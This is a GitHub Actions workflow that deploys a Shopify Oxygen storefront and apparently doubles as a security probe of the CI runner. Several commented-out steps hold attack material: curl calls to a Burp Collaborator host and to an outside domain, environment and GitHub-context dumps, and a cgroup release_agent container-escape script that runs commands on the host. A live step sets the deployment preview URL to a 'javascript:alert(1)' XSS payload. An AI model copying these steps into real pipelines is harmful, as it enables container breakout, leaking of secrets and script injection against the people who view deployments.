# Don't change the line below!
#! oxygen_storefront_id: 1000008763

name: Storefront 1000008763
on: [push]

permissions:
  contents: read
  deployments: write

jobs:
  deploy:
    name: Deploy to Oxygen
    timeout-minutes: 30
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      # - name: whoami
      #   run: |
      #     whoami
      #     echo $USER

      # - name: request burp collab
      #   run: curl -i https://bvax5nq9pkc5mieakbbxu6cv4macy1.burpcollaborator.net/?sosi=hui

      # - name: curl server
      #   run: curl -i rujka.ru

      # - name: Open ports
      #   run: sudo ss -ntlp

      # - name: Create interface?
      #   run: sudo ip link add dummy0 type dummy

      # - name: Interfaces
      #   run: sudo ip link show

      # - name: /etc directory
      #   run: ls -la /etc

      # - name: ps aux on container
      #   run: sudo ps aux

      # - name: Ps aux on "host"?
      #   run: |
      #     sudo mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
      #     sudo echo 1 > /tmp/cgrp/x/notify_on_release
      #     sudo host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
      #     sudo echo "$host_path/cmd" > /tmp/cgrp/release_agent
      #     sudo echo '#!/bin/sh' > /cmd
      #     sudo echo "ps aux > $host_path/output" >> /cmd
      #     sudo chmod a+x /cmd
      #     sudo sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"


      # - name: Display Environment Variables
      #   run: env

      # - name: Current folder
      #   run: |
      #     ls -la
      #     pwd

      # - name: github context
      #   run: echo "${{ toJson(github) }}"

      - name: Setup node.js
        uses: actions/setup-node@v3
        with:
          node-version: '16'
          check-latest: true

      - name: Cache node modules
        id: cache-npm
        uses: actions/cache@v3
        env:
          cache-name: cache-node-modules
        with:
          path: ~/.npm
          key: ${{ runner.os }}-build-${{ env.cache-name }}-${{ hashFiles('**/package-lock.json') }}
          restore-keys: |
            ${{ runner.os }}-build-${{ env.cache-name }}-
            ${{ runner.os }}-build-
            ${{ runner.os }}-

      - name: Install dependencies
        run: npm install

      - name: Build and Publish to Oxygen
        id: deploy
        uses: shopify/oxygenctl-action@v4
        with:
          oxygen_deployment_token: ${{ secrets.OXYGEN_DEPLOYMENT_TOKEN_1000008763 }}
          build_command: "HYDROGEN_ASSET_BASE_URL=$OXYGEN_ASSET_BASE_URL npm run build"

      # Create GitHub Deployment
      - name: Create GitHub Deployment
        uses: shopify/github-deployment-action@v1
        if: always()
        with:
          token: ${{ github.token }}
          environment: 'preview'
          # preview_url: ${{ steps.deploy.outputs.url }}
          preview_url: 'javascript:alert(1)'
          description: ${{ github.event.head_commit.message }}
        
